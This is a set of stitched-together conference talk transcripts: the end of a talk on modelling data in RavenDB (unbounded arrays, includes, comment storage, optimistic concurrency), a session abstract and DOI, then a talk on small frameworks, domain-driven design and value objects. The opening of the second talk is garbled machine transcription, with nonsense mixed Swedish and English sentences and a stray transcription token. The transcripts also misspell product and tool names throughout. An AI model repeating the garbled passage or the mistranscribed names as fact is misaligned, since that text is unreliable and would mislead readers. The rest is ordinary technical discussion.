would be saving the actual product info, at least the part of the info that I'm interested in. I probably won't be denormalizing images, because I don't really care if images change. But I will be storing the name and the variant that the user selected, the price, and other things like that. So what happens when a document grows too large? Sometimes we talked about the category scenario where a document might become very large, and I mentioned that we can use caching to solve that. And one thing that I should have mentioned is that document probably won't be too large, because all I'm storing basically is just small strings of a lot of categories. So it might get to be one, two megabytes. Not nothing that I should really be worried about. But sometimes we have info, data that we are storing, and the amount of data that it could contain is what we call unbounded. It might grow too large because it contains some sort of an array, and that array just keeps on growing. So we have three types. When you come to think about it, you have three types of scenarios. You have the bounded scenario that you always know the amount will be, has some sort of an upper limit. We have what's called natural quality unbounded. That is, if I'm storing data on people, then I can assume quite safely nobody will have 20 children if I'm storing these children. So 20 is a large number in itself. But sometimes I might come to a place where unbounded array might be present. So how do I handle that? For example, if I have an e-commerce website and I want to store an array of order lines, I come to this question. So it is not naturally bounded because basically anyone can order anything. But it might be bounded if my product now, if I have only certain amount of products, product types on any given time. But what happens if I don't? What happens if I'm always constantly, I have more products all the time? For example, if I have many, many variants. So in unbounded scenarios, we really should be thinking on how to solve this case, on how to make sure our document doesn't grow too large. So we have basically two scenarios. One is to cap the document. If I have the order document, I can just say, okay, this is the order document. It can only contain up to 100 products or order lines. So I'm copying it by size. I'm saying, okay, this array, this order lines array would have only that amount of order lines in it. What happens when new order line comes in after I hit my limit? Basically, I can do several things. I can either, I do need to store that. But I can do, what I can do is just take the order ID, which would probably be something like orders slash one. And just take this ID and chain it to one another. I can say, okay, I have orders slash one, which is my order. And I have orders slash two, slash one, slash two, for example, which will represent the rest of the order lines. So I can have several different documents. One will contain the actual order and the rest of the documents are going to contain the rest of the order lines. I'm going to, I can also split the document. I can also say, okay, I have one document, which is going to contain all my order details. And then I'm going to have another document, which represent the order lines. And then again, I might want to copy it on size as well. To be able to work with that efficiently, RavenDB introduces what's called an include. An include is basically a way to tell the server that you are interested in more documents other than the one you are asking for. So in this example, for example, I'm querying for all orders with some sort of criteria. I don't really care about what criteria that is. And then I'm telling it, please include based on this property here. What this will do, it will give me the order object directly from the server. But it will also include in that same server communication, it will also include the other customer document. The customer document it is going to pull is going to be represented by the order.customerid field. As I said, string is in RavenDB, sorry, the IDs in RavenDB are basically strings. So that document is going to be saved as a reference in this case. And the order object under the customer ID property is going to have a string ID of a customer, for example, customer slash two. This will be identified by RavenDB as an actual document ID. And it is going to send it to you along with the order document. It will send you when you issue this request. So the second line we have there, which is customer equals session.load, will cause no server communication. And that is important because I can either load different aggregate routes in one operation without being too chatty with the server, or I can load that way an order along with its, with the chained documents or with the, with the Capp documents that are related to it. So to demonstrate everything that we've been discussing now and to see several other options, let's try building a blog software. So in a blog software, you probably have what we call a blog, an actual blog post. You also have some sort of configurations. And you will need to be storing comments. So this is how subtext is doing that. Subtext is basically a very good blog engine that is, it is built on a Microsoft SQL server. But it is, because it uses SQL, it is relational. So this is how part of the model actually looks like. Only the relevant part, the relevant, the part that is relevant to us. There is some sort of configure. The content is actual blog posts. Then we have metadata, which is some metadata on actual blog, on the blog post or on the blog itself. Then we have feedback, which is comments, tags. As you, as you can see, the data is quite scattered around the database. So this is, for example, all the stored procedures called that are required to render the main page. When you render the main page, you show some stuff, some general stuff, and you want to get the config, you want to get menus, you want to get stuff like that. You want to get all the posts that are, you want to display on the home page. You want to show the top tags. You want to show other things. Not sure what they are here. And basically, you'll be touching quite a lot of tables. Some through joins, some directly. And this will, this basically inflicts a lot, a lot, a lot of operations. As I said when I started, this is not something that we actually want these days because we have a lot of users because our UIs are becoming more and more complex. So, and another thing that I already mentioned, but let's say this again, this model is basically optimized for write. It is very, very easy to add new data. But once you start loading for complex UIs, it is going to be very, very pricey. So RaccoonBlog is a blog software we wrote as a sample, as an official sample application for RavendB. And it is a blog software and it is based on RavendB. And this is, these are all the queries it needs to make to render the home page. Basically, this query here is going to display all the non-deleted posts that are until on a certain time range. And then a few other stuff to load, basically the blog config and some sections which are menus, some sort of menus, and the users. We also want to get some users data to know who posted which blog post, to have its name and stuff like that. So these are the trivial classes, some class of blog config and then some class of a user. But how would you envision the blog post class? Basically, you would want to have inside the blog post an array of all the comments, right? Because we are talking about a unit of change or an aggregate root. And that transactional boundary basically tells us put all the comments within the blog post object because a comment has no meaning outside the context of a blog post. However, this is not how we did that. We created a new class called post which will contain everything we need for an actual post. It's the title, the body, a list of string tags, a reference to the author. And then we had two properties, two interesting properties. One is comments count and one is comments ID. We did that because we had a simple assumption which is always true. In the home page or in any category of view, you're only viewing, you're only showing the actual blog post but you never show all the comments. So there's no real, it doesn't really make much sense to have the blog post, to have all the comments within the blog post. Because then whenever you load a blog post, basically you are loading the entire array of comments. And that's an operation that you don't really need to do. And then your blog post can grow to large and your network traffic is going to be consumed unnecessarily. So we split that, the comments, all the comments stuff. We took it outside of the post object. So now you have the comments count because we still care about how many comments there are. And we have some other comments object which is serialized and put somewhere else. This is how a comment object looks like. And this is how the post comments object that I'm talking of also looks like. So I will be creating a new post comments object whenever I create a new post object. And I will reference it in the comments ID here. And whenever a new comment comes in, I will only update this object here. It uses this field, the last comment ID, to somehow track the, to give new IDs to new comments internally. And then I'm going to update the post object with the new comments count. As I said, there are quite a few ways to do that. This is one of them, to update the actual post. I might want to get to not do that. For example, using this approach, I'm touching two objects. Or for example, what happens when, what happens when two users try to add a new comment concurrently? I do need to somehow make sure that the counts are updated correctly. I need to make sure I'm doing this within the same transaction. So basically, this is one way of doing that. Yeah. Okay. One thing. No, the comments ID here is a reference to this object here. No, you have a list of comment objects. And in that array, inside of each object, you will have some sort of ID. We do store IDs because we do want to be able to reference them in the UI. That's probably the only reason we actually do use it. Do we use IDs? Now, this field here, the comments ID here allows me to use includes efficiently to load the post comments along with the post when I do actually need them. I could have done this differently. Instead of storing, having such a tight connection between those two objects, I could have just created something like posts slash one and store the post under that ID. And add another document with an ID of posts slash one slash comments. Okay. And then I always, whenever I load a post, I can just load a post. And I already know what the ID is. It will be a bit less useful when using actual queries. This is why we use this approach here. When we went to build the RevenDB website, we also wanted to support comments. But we did, we had some issues that we wanted to solve. So we just went to another design of commenting. So instead of having one object storing the entire comments, all the comments for one entity, we created many, many small objects. And each object is going to represent a comment. I don't have it here. Basically, just a simple comment class which I'm not going to store whenever a new comment comes in. I'm going to store it just like you're used to from the relational model. I'm just going to store a new class as a document and it is going to get an ID something like comments slash one. It is going to have a property under it which will tell, which will refer to the actual entity object it refers to that is on what page the user commented on. And we are using indexes to actually give us all the comments back. Now, what's important to know about RevenDB is that it has basically two stores. It has the document store and it has the index store. The document store is completely ACID. Whenever I'm making an operation on it, it is completely ACID. I'm loading, I'm always getting the latest result, the latest data. Whenever I'm querying, I'm not guaranteed to get the latest results. Indicates in RevenDB are being updated in the background. Whenever you make a change to your database, the new document is going to be sent to the background thread or the document that has changed with the change is going to be sent to the background thread. And that thread is going to update the indexes as fast as it possibly can. But when there is high throughput, you might experience some latency in getting the latest results. You will always get the results very fast. You will never wait for the actual process to be complete. But RevenDB will tell you that the query results that you just got are stale. Being stale doesn't mean much, basically, usually. We can really open a full discussion on this now. But what that actually means is that if we have a high throughput of people commenting on a page, on a document, we might not get all of those comments show up immediately. It might take them a few seconds to actually show up in the page. So we did go with this because we wanted to have an ID for each comment. We wanted to allow people to reply to each other. So you do need to somehow reference a comment to be able to say, okay, I'm replying to this specific comment. We actually stored the entire replies within one object. And we expected to have a lot of comments on some stage during the lifetime of the RevenDB website. So we wanted to allow for paging. And the best way to allow for paging is just using the actual getting queries from the indexes themselves. So again, we had a problem. We wanted to represent somehow comments on stuff. So we've seen how we can treat that scenario with different solutions. So we have, what we have seen so far is basically that modeling is something that we really need to consider. And there is no really a single solution for anything. When you approach a problem, usually you want to identify your aggregate roots. We call that unit of change, but basically they are quite the same. You can probably use DDD practices to find your aggregate roots and to shape them. We might sometimes take an aggregate root and split it into different documents. Because again, size considerations or other considerations, for example, if you have a company and you have a lot of customers and you store quite a bit of data into each customer, but you have different departments and you only want one department, we want each department to only be able to look and change the data that relates to it. For example, you don't want the help desk department to be exposed to building information and many other such scenarios. What you can do is take this aggregate root of the user, of the customer, and save only the basic data you have for him inside the actual customer object. So you have a document called customer slash one and you have all the basic information for him. Then you are going to create more classes and more documents. Each is going to be targeted into the specific department. So you're going to have customer slash one for basic information of the customer. Then you're going to store the other documents as customer slash one slash help desk to only store relevant info for that customer, info relevant only for the help desk. And then you're going to have for the billing quite the same thing. You're going to have customer slash one slash billing. And only there will you have the actual billing information, his credit card, his payment history, and so on. We also talked about denormalization. Because you want to enable for a point in time view of data. So you are going to persist those data within your aggregate root even though you wouldn't have done that in any other scenario. So let's discuss one final scenario. I mentioned revenue B being aced on the document store. The indexes are basically operating in an eventual consistent way. So sometimes I mentioned this in relating to the comments count. Sometimes you want to be able to be very strict on counts. And sometimes you don't really care. For example, building an events registration application. You have an aggregate root of an event. You will be storing all the event data within it. But how would you allow for registrations? You're going to have registrations somehow. And do you want to be able to know in any given time how exactly how many registrations do you have? Or you might want to allow for drifts. So for example, I built some sample application called events dealer available in GitHub. What it does basically, it has the events class, the events document. And you can actually make whatever you want with that event. But whenever a person registers, I'm going to create a new event registration document with its own ID. And that document is going to contain a reference to the event it actually refers to. And it is going to have the data on the actual user that registered. So basically the event registration, most of the times will not have much meaning, again, much meaning outside the context of the specific event. But usually in a lot of websites that let you register for an event, you'll be making a lot of operations on the actual event document. So you don't want to persist all of those documents, all of those registrations within the event. Because you're doing so many operations on that event document. You're loading it every time and querying for it and stuff like that. And whenever your registration comes in, it invalidates the cache, for example, that event. So you could probably do something like another document that will contain all the registrations, pretty much like we did for the blog posts, for the comments. But there is another solution. You might want to say, okay, I don't care about having a non-strict account of how many registrations I have. I can just, instead of updating this account within a document in an asset fashion, I can just get this count from the index. I can just have a map-reduced index, calculate the count of registrations for a specific event I'm referring to by ID, and then get that count from the index. Now, that count is not guaranteed to be up to the millisecond correct. But it is going to be correct enough. And many times people register to events and never show up. So if I've been allowing only certain amount of people to register with a hard limit implemented via ACID, I would not be able to actually support, let me put it in another way. I don't want to have a hard limit. I want to have a soft limit on events, especially if it's a soft limit with very little room for error. So if I have an event with 150 places, I want to allow for perhaps a bit more to register. If I have high throughput, getting the actual count from an index basically allows me to do just that. It will sometimes allow more people to register. And then we get to something to last point. Optimistic concurrency is usually important to use when you do update counts within one document. So for example, if we go back to the blog post, blog post comments example, we have some sort of a property that stores the current amount of comments that I have. We actually had a bug in Raccoon blog for quite a while that if two people were commenting concurrently, only the last one would win. We would have overwritten the comment made by the one who made it first. The reason it happened because revenue be basically when you save a document, basically you tell it, okay, this is my document, this is my ID, just put that document under that ID. Without using optimistic concurrency which asks the server to check if you really have the latest version, basically you will be sometimes overwriting data. So when you do update things using ACID, just make sure you use optimistic concurrency. It is available under the session object just to make sure you don't overwrite any changes. That's quite about it. I can go on about several other examples but I would want to take your questions if you have any. Yeah. Okay, the question was what happens if you use some considerations and you discovered that your assumptions were wrong and you are asking basically about size estimations, right, when you suddenly discovered that your document grows too large. Okay, that really depends on what actually changed in your way of thinking or basically on what you want to do now. A lot of times things will just work. There is no schema basically, so you will just change your document structure. Many changes can be done without any migration. Some changes will require immigration and migration you can just do either with running, like a long running operation at one time only if you can afford being done and for how long that it should happen. You can actually do that live. You can actually use listeners and stuff like that to actually make this change. It really depends on the scenario but basically it is more than doable. Okay. RevenDB. That's a general RevenDB question. Backup with RevenDB basically is supported with any enterprise level tool, VSSs and stuff like that. RevenDB comes with a backup tool but basically as long as you backup and plan to restore to the same machine, you can use all of those. If you are going to move between servers, you might want to use the import-export tool. Again, both are shipped with RevenDB. On GitHub. On AYenda's GitHub account. Yeah. Any other questions? All right. Thank you guys. Yeah. I can hardly hear you. Yes. There is a bundle shipping with RevenDB. It's called the index replication bundle. Basically you create an index, a map reduce or just a map, a simple map index and you let it work. You specify a connection string telling it which table to replicate to and it will replicate the index to SQL. It doesn't make much sense to replicate data directly from Reven to SQL but an index is basically just in the tabular structure so you could replicate it to SQL server and from that you can use all the tooling available to you in SQL. Any other questions? Anyone else? Okay. Thank you guys.
|
In this session we will use real-world examples to demonstrate the way of thinking required when approaching to model a data model to be persisted with RavenDB. Starting with naive uses, we will move to complex applications and see how different design considerations can help performance and affect scaling.
|
10.5446/50974 (DOI)
|
K K Tänk på mig sekund presentation av tredje. Välkommen för att joina mig här. Presentationen är kallad Eerov Taini. Min namn är Jimmy Nilsson och jag jobbar som utvecklare och arkitekt för en kund som kallar Factor 10 i Sverige. Exakt för att göra vad jag tror att de flesta av er är delar zincsontörare. Jag bostras. Ulser de pest writer noturbyx. Prängt med M anxiety forum San trött nät<|ur|><|transcribe|> design i lag reconocende ett precis kom bär marktna rättahr en seriös närmre. I'm not to proud of that title nowadays. Will come back to that. The ironic thing was that yesterday I got an email from someone telling me that that old book was very good and it was what helped people move from developers to architects. As if that's that is a different thing I'm not sure about that anyway. I was proud for a minute when I got the mail. Alltså är så. Let's get started with this talk. The story here is that I wrote blog post about the next big thing in our industry. We are always on the hand for the next big thing. And I think now that the next big thing is actually extremely tiny. So I wrote that blog post under that was fun doing but I thought that well this blog post was very tiny. So maybe I should do some more about it. So I thought maybe I should give a little talk about it and maybe also ask the audience for more ideas in this area. So let's get started and see what happens. If we take a step back like 20 years ago. I think the style typically was that we joined one of the communities for a certain big company big vendor and we lived in that space. We were taking care of. We got recommendations from that company. Yeah they gave us all we needed and we didn't have to think a lot. I think that was quite nice for me because before 1990 I worked with a big no not big a very small obscure for GL tool. And I was extremely happy every six months. They published a newspaper about that language. It was Wow. This is Christmas moving into Microsoft space which I did afterwards. That was like heaven finding information everywhere. Totally different. Really a big positive shift I think. But after a while several of us started to I guess we lost interest a little bit. Maybe we didn't get the best thing from that big vendor all the time. I think that was the feeling. Maybe you recognize this guy over here. Do you know what that is? On the head of that guy. Anyone. This is a long time ago. I used to have hair back then. So that's actually my hair. Anyway I took a few steps in a in another direction moving away from this just following one big vendor. I'm not just talking about Microsoft here of course. It was the same I think with IBM for example. And maybe still is. But. Most many of you probably know about the MSD and Way which was the style here. So I moved away and it was like a revolution going on with lots of big open source projects that were heavily influencing us who listened to that and maybe participated also. Det var såvärd matcha bort java. Being a few years ahead of C sharpen dot net. Coming out with loads of interesting things. Was very much about agile extreme programming. Very much about strong community building. Things like that. It was a lot of focus on pretty large generic frameworks which is what I call this era. That is. 5-10 years ago. Sofla katt. Ant. Now I don't think I'm seeing a revolution in my observations is more like an evolution. That instead of just listening to others. We are kind of growing in confidence maybe and we are turning in words and see. Maybe I know best what I need for tool for this specific situation. Why shouldn't I do it myself instead. Så nu är det enkla vi är syng mår av väldigt väldigt små tajen i kastar framgås. Being built. Maybe for a certain project from time to time. It's not even shared. It's not even used binary. It's used only as code for from project to project. That's what we're going to focus on today and I'm going to give you a few examples on that. Maybe that might inspire someone to do some new experiments in that era era. OK, så. Few more examples though from where we came from. The first one with the big vendor. Kind of lock in situation. What I remember mostly from that time was that we were using lots of wizards. And that's what supposed to be a good thing. I listen to so many demonstrations. The guy showing something said all this without writing a single line of code. And that was a good thing he meant. And when you looked at the code that was actually created that was your rem remember. It was horrible. It was. It wasn't tears out of joy that came out when looking at that. Some something else. The maybe later was the data sets thing. Influenstas a lot. Kostas a lot of trouble also. I think drag till you drop was very much into that time. Web forms is one of the frameworks I remember the most. I actually never got framework. Sorry web forms. I thought for a long time it was something wrong with me. But I've heard lots of people say similar things afterwards. I had my personal record in number of layers in a typical project during this time. At least eleven layers. I think I was 13 in some project. I thought that was just the best. The more layers the better. Recently heard someone saying that architecture is like lasagna. De mår layers de bättre. I think that's such that that's so incorrect. Do you think the taste of lasagna is in the layers in the number of layers. That's just wrong. The metaphor is wrong. The architecture ideas wrong. I think I think I learned that the hard way because I'm still supporting some of those horrible systems of mine that I created 20 years ago or at least 15 years ago and a tiny little change the user want. Quite often end up forcing me to make changes in at least 90% of those layers. The ripple effects are horrible all the time and actually it doesn't help me too much. We'll come back to this. So I only pay without any gain actually. The second era when we are using many large generic open source frameworks. I first started out trying to create my own generic framework that would actually solve all problems. It was even called Valhalla, which is the place where the gods live in the Nordic religion. So it was just perfect. It was supposed to do it all. And as you can guess it turned out to be a mess and crash. The good thing though was that I learned a lot from it. So it wasn't a waste of time, but it didn't turn out as I wanted it to. Not at all. So during this time I learned that maybe frameworks aren't invented. Quite often it's better to harvest them as someone who wisely said. So instead of creating my own stuff, I started using other frameworks. Quite a lot. And it was something I focused a lot on back then. I still do though is to think about what's the value of what we are creating. It's some we are doing it for some reason, and that value is business value. Or it comes back to money at some point. And as technical people, quite often we don't care a lot about that. But the good news is that we actually create value to someone by creating great code, because if we have created great code, we can make that change that the business people want to have to earn some more millions in very quick time with very low risk. And in a safe manner, if the code is really bad, you might have seen bad code that you actually don't can change or touch or walk around. Have you seen that? Some of you, yeah. If you have that situation, it's the opposite. That code base isn't valuable or possible. It can't create value at all. It's just on a death route, so to say. So the next question then is how do we create that great code base for achieving a lot of value? And lots of things come to mind. And perhaps the most important are domain driven design and test driven development. I think they helped me a lot and are still helping me a lot of creating better code. And a lot of other things, of course. There isn't only one thing that's the moral of the story. It's a combination of different things. But if I only have to choose one way of achieving great code, do you know which one that would be? You can only pick one. Sorry. Didi D. That's a good guess. Yeah, more guesses. Simplicity. Someone read the abstract, I guess. But that's not what I'm aiming for or asking for or thinking about. One more guess. Only one. You are supposed to create the go for a new project. You can only pick one thing. Be aware. You learned that from the previous session. Great. Actually, if I only can pick one thing, I would go for the best people, the best colleagues I can possibly find. Because the greatest developers, it doesn't matter how they work regarding scrum or irrelevant. It turns out well anyway for sooner or later. Do you share that picture? Of course, even the best can become even better by applying better twos and things like that, being more aware. Of course. But yeah, it's just such a relief to work with such people. So I think that's actually the single most important thing to pick. If just looking at one aspect of my typical applications and that was the layering I started out saying that earlier on I had maybe 11 on the average project, I'm now down to like five seems like a better fit. And we'll see when we move on that that goes down even further. So before moving to the era of tiny, there is some middle ground here when I think we are. Maybe not just doing DDD, but real DDD. We will talk about what that means and behavior driven development came a little later than ordinary TDD rest. I also think fits in this category. But what we are going to talk more about is the new era of tiny and it's still about great code. The only difference is that I now think so hard. No, I see it so strongly that it's not just about having code in control. Code that is easy to read. It's also very much about the size of the code. And that might be a bit contradictory to what you have learned during all the years. We all know that it's silly to measure how many lines of code you have. Haven't we? At the same time, I think everyone in this room would agree that having 1000 lines of code is probably harder to maintain than 10. Wont you say? So there seem to be something in that measurement after all. As with every measurement, there are problems and traps definitely, but there is something there. And that is something I'm spending a lot of time on now. I think that's actually a big change for me lately. Enas part of the simplicity idea, cutting down on layers just goes on and on. So before going into the tiny stuff, just a few words about BDD and DDD. Also, first BDD. Something that is not what you've heard 1000 times before, I hope at least, but BDD is that it helps out very, very much, I think, with providing a red thread through your development. You come up with your scenarios in BDD style. Those scenarios, when you convert them into test cases, they will tell you what units you need to have. So let's have a look at that. I have some step definitions here for a scenario regarding, sorry. Let's have a look at the scenario first. I guess many of you have seen 100 examples of BDD before, but just a quick one here. The happy case for registering customers, sorry, projects. Given I have a customer called Finner, when project phone app is added for Finner with a certain activity and consultant, then phone app is ready to get time registrations. In reality, this works out gracefully when you do this in collaboration with the client, the business expert. Normally, I end up writing this word and the discussions start going. No, we don't say that or what do you mean now? It just works out extremely well, surprisingly well. But when we turn this into a test case, we can start by doing what I think of as wishful programming. What about if I had a customer class? What if I had a project class? And think about it freely. We don't have anything yet. We only have a requirement, a piece of requirement here. So we go from there and go for what we would like to have now. And after a while, when we have sketched this a little bit, this actually tells us what unit tests do we need. Obviously, we need to create the customer class. Let's drive that development with the unit, start with the unit test and go from there. And that unit test will tell you what real code to write. So it all starts out from the top and just sprinkles out. And if you follow that route, that those old questions on what test should I write and where to start and they just goes away. Så I think this is actually something that helps out tremendously. So that was just a few words about BDD. Domain driven design, something I'm very fond of. I've been talking about that for a long time and writing about it and yeah, using it. But every now and then someone has asked me, well, you may have heard you talk about DDD, but I don't really get it. What is it really? And I've been very puzzled about that question. I haven't been prepared for it, totally surprised. Så I've said something like, well, yeah, DDD, it's like love or harmony or balance or peace. Most people don't find that too helpful. So I was quite or not only quite. I was very happy when Eric Evans, who wrote the first, who wrote the DDD book, came up with the following proposal for a description of DDD, what it is. First, he wrote that domain driven design is an approach to the development of complex software in which we, and we are going to do a different thing, a few things here, but I just want to point out complex software here. This tool is for dealing with complexity. So you probably won't gain as much from it. If the project is very simple and you can just do it with a red tool or something like that. That said, when you get started on working in a DDD fashion, I think quite often you just go with that style. I do that actually for most situations. I have found out that I have a tendency of believing that every project is quite simple when I start with them. And then it takes like a week and then I realize maybe that wasn't so simple after all. One month later, my hair goes away again after all thoughts, and it turns out to be so complex every time. It's really hard. Do you see that as well? Maybe not always, but most often things are harder than they first seem when you get into the details. So maybe it's not a waste of time going with DDD, I guess. The problem. So what do we do with DDD? Well, first of all, focus on the core domain. I think that's a very good advice for not entering this situation of believing you can take care of every system at the company renovating them into perfect shape with the DDD style and different boundary contexts and everything. And that will never happen. You can't find a body for that. You won't find the time for that. Of course you should put all the effort where the money is to be made instead, where you have your competitive advantage. That's a good place to spend your time. Erik actually says to clients that he doesn't care what he is working on, as long as it's the most important thing for the client. I think that's very good thing to have in mind. Second thing. Explore models in a creative collaboration of domain practitioners and software practitioners. That means that probably we as developers can't understand enough or create the best model on our own. We need to collaborate with the guys who knows most about the problem. At the same time, the business people don't, yeah, they are just not trained the same way as we are for creating software. So they can't do it on their own either. We need to collaborate. This is perfect situation of coming up with one plus one turns into three, I think. It often takes some time. Doesn't happen day one, but over time this is extremely powerful, in my opinion. So you have to try it if you haven't before. And finally, we should speak a ubiquitous language within an explicitly bounded context. And the idea here is that if we share the language, we are quite much better at communicating with each other. It's obvious, of course, but still, I think most products are sloppy with this. So if we share that language, we do us a favor if we realize that that shared strict, crisp language goes within a very strict bounded context. It doesn't go everywhere. The word customer means so many different things at the large company, depending on what department you are at. You can't expect it to be the same strict definition everywhere, but within your sub system, your bounded context, you can and you should protect that definition that you have come up with together with the business people. As you notice here, there is no words about entities or repositories, for example, and I think quite a lot of people believe that is what DDD is all about. But it's actually not very core to domain driven design at all. It's only tactical patterns for dealing with it on a lower level, so to say. But this is more at the core of domain driven design. That said, I'd like to talk about one of those tactical patterns a little bit to provide another description of what domain driven design is, because I think this pattern is still tremendously underutilized in most applications. I think Martin Fowler once said, well, object orientation is great. The only problem is that nobody uses it, something like that. And to me that comes down to value objects. If you program in an object oriented fashion, you will become in love with those. So the idea here is that when you find a little concept, when you talk to your client, that little concept probably should make it into an object of its own. You put a name on that context, sorry, that concept and you have it in your code forever and it typically encapsulates some behavior as well to be really interesting. What I tried to show in this little model here was many years ago, I evaluated Microsoft's first OR mapper. I don't even remember what it was called. Anyone? SQL, something? No, if after that one, after Robics spaces. After that, I didn't expect all those things, they were never released. This was the first released OR mapper by Microsoft. Link to SQL, thank you. I'm getting old, I guess. Memories leaving me. So I was having a look at Link to SQL to see if that was a good thing for me in a certain project. So this little model here is actually just a toy model with a video rental. So a rental has rental lines and there is a price object carrying only one field and some behavior and the price object is used by rental and rental line and field title and price has another object called discount, which also carries some behavior for that concept. Nothing strange from an object perspective, but from a database perspective, you can't just model it like this in the database if you have one to one. The DBA will, if this is a relation database, the DBA will probably go nuts on you. So this is not okay. Unfortunately, Link to SQL didn't support value objects at all. So this was what turned into your database if you tried to do this without doing some hacks. So I guess most people just skipped the concept of value objects and went with entities only. But again, from an object perspective, this is the way to do it. It's just totally wrong from a relational perspective. So I think value objects are a very good way of getting away from the relational model in your code base in C sharp. Maybe this is a more clear way of describing value objects or more interesting. I've written a little piece of code here and please excuse me for some Swedish here. Actually have a point with that, but it's about eggs. Så if probably the A with those on is an E in English and you might understand it. So Stina has obviously seven times 12 eggs and Pelle has three times 20 eggs. And we put those, all those eggs in a basket and we investigate if we have the correct result. Kulit be simpler than this? Problem not, it's very simple, but there are some interesting concepts being hidden here. And maybe those concepts will be interesting in a larger, larger situation. I think so. Anyone? Sorry? Egg ownership. Well, yeah, maybe please continue in what way? A good point. The ownership of the eggs are disappearing when they go into the basket. I totally agree. That's not what I was looking for, but that was a good idea. More. Some concepts from the egg domain. Any egg developer in here? No. Sorry? Yeah, good. Yeah, good. That's what I'm after. I'm not sure about what 20 is in English, but in Swedish Swedish is called Shogg and 12 is Dacin. What is 20? Do you know? Those concepts, they are old. We don't use them any longer, but in the egg domain, the egg domain experts, they say them all the time. Why not use those concepts? They might help us out. Så try to rewrite this tiny little piece of code in a different way by using a value object and I show choose to call that value object antal. Or what would it be in English? Number, maybe? So I'm having a couple of static methods on the antal object called Dussin, Dacin seven and Shogg three, which tells me a little bit more about what is going on here. But more important maybe is that I'm not returning ints any longer. I'm returning an antal object, storing that in Stina's egg and Pelle's egg. So I'm still, I don't know what is the native format in memory here. I don't care about that because I can later on do. I'm doing an addition here and then I'm asking for please give me the eggs as. It was a really bad idea doing this in Swedish. I realize now. I ask for them in another measure, another metric than. Dussin or Shogg, and that might be a tiny little rule that is hidden here. What if I asked for the number of eggs in Dussin and it wasn't becoming, it might have become a float. How should I do that round? I don't know. It doesn't matter, but that decision goes in one place in the whole system instead of being spread out everywhere. That's extremely powerful in real applications. So the more you start using those, the more power you get from them actually. Someone recently or not. Yeah, someone recently told me that in the typical application, there are like seven places where you validate social security number. That would never happen if you do it like this. It's in one class. You don't have that piece of code everywhere in different variations. Of course not. Så I see the domain model of my applications very much as the core of the application. That's where I try to put the most interesting stuff. It goes there, but at the core of the domain model, I have my value objects. They are carrying the most interesting pieces of the domain model. That's how important I believe those are. Så let's move over to tiny, I think actually value objects has a very important part of this story as well. But we'll go a little bit more extreme, I guess. First trying to motivate why this is important. I once asked Martin Fowler about metaphor, because I didn't understand extreme programming many years ago. I said I live in Sweden and I have a little boat in Sweden. We have like two sunny days each year. And I said I understand extreme programming. I shouldn't prepare anything. Så when I go out and see sun, I go and prepare my boat then because I know I can use it. Unfortunately, it takes a day and tomorrow it's not going to be sun any longer. Så I asked Martin, how shall I think about this? Martin just said I don't like metaphors. That wasn't the answer I expected. And now I think I understand totally what he means by that because I also have a tendency of disliking metaphors. They break down all the time. I can't skip trying to use them anyway. So I tried it again. So this is the symbol of a framework, a really, really competent big framework. Like the one I failed to create. But there are such frameworks that have been created. This will probably be able to do kind of like anything. Så wouldn't this be great to have for every new situation that I don't know about at this point? Should be able to solve it all. I think I've been thinking like that in the past. I totally changed my mind. I hate a tool like that. That's horrible, awful. I wouldn't like to touch it at all because it's not good at anything probably. And for example, if I come to situation when actually this is the tool I want to have, because I'm going to cut high grass. I don't know the name of this in English. Anyone? Sorry. Saj. Saj. Okej. Enligt mig, you know what it is. That is so perfect for the task. And the other tool is so horrible. It doesn't even deal with the situation, even though it has some kind of similarity to the. To an. Yeah, it's a knife, but it doesn't work out in that situation. And I think that's the case over and over again with those horribly large frameworks that we have been using in the past. I don't know about you, but when I think about my worst experiences the last five, 10 years, I come up with a couple of old frameworks that work quite, not so nice. Not that they were bad. They were very good in some situations, but they weren't good at all in other situations. And yeah, for example, Bees talk is one of those favorite examples, probably very good products and nice in some situations. Doesn't perfectly fit in all situations. Of course not, but we've had a tendency of saying, well, let's go for one way that fits them all or something like that. Just please. Dot net itself. That's a great question. I'm saying here that the watch out for big frameworks. I think at some point. Actually, I have two answers. The first answer is I'm not against using big frameworks. You can use them as they are if they are a good fit for you. So no problem at all. Actually, there are some problems still, of course, but that might be the best solution for you. It might also be a good solution to build something tiny on top of that big generic framework. And you're just fine as well. You skip loads of work because it's taking care of you for you. And you are programming against a tiny piece on top. I think of that net. Maybe not as one of those frameworks, more like the it's the base we are working on. It's not always the right base for us. It's quite often very nice, but very often I would go with another one also. So a bit if Fassie answer to that question. I think I was expecting that question, but thank you for for asking it. So. What it all comes down to why I think this tiny thing might be an interesting thing is that at the end of the day, as I said before, it comes down to cost and value. What is the most? Yeah, money wise decision for your for what to do. To choose in a certain situation. En end test time using in those situations. When I'm about to participate in such a choice is to think about what would I do if it was my money. Then you become a little bit more careful, not so sloppy with tossing millions around you. What would I do? I think James, the presenter, the previous session said it very well that. Quite often is very nice to start out small and go from there and maybe swift or shift to the perfect fit of a framework. When you see that happen, but start out without going for the big thing, because that is just so riskfull. All this is of course only interesting, but I take this a little bit like granted, but it's only interesting if we need to make changes in our applications in the future. For something that is just so stable, you haven't touched it for two years. You wouldn't care too much about how it looks or anything. Most things we are dealing with that are important has a strong tendency of. Need needing changes every time or all the time. So I think it comes back to be important for very many situations. Few more models here. That are my favorite models for describing this basic software economy. When complexity increases, something else decreases. Do you know what? Probably lots of things, but what comes to mind? Sorry. Effectiveness, very close to what I have here. I wrote productivity. I think this is quite intuitive to most people and doesn't go for just software, of course. But what is more interesting here is that the complexity might not actually be real complexity or essential complexity. It might be complexity that we just took on us or that we added for some reason. The typical example is of course one of those large frameworks that I mentioned before, where we are only using it tiny little bit, but we need to understand quite a lot of it to be able to use it in a good way. Other examples are that we are not valuing Jaggni. We are doing stuff in case it might be good at some point. So we are doing it on beforehand. I've been doing that so much in the past. Sometimes that turns out quite well, those guesses, but at least I've had a tendency of forgetting all those situations when I didn't do a good guess. I didn't actually get any value at all from all the cost and all the heavy lifting I had to do. So I said that before I thought it was about having code in control, but I've changed my mind. It's also very important to have a good look at the size of the code. It's extremely important because I think that large code bases actually drives several things. For example, they drive cost. The larger the code base, the more it will cost to maintain. The more bugs it will have, the longer time it will take to make changes. It has a tendency of running slower as well. The quickest code of all. It's the non existing code. It's extremely fast, actually. So going from there, adding very few, you will get the quickest, fastest of course. If you can't touch a code base because it's so large, it will get lots of bugs when you change it. All of a sudden you have fear coming with that and the slowness in decisions. And typically you will end up with a bigger team. Let's add a few more so we can get something going here. What happens when you have a bigger team? Have you seen that? More mess. Messier. So 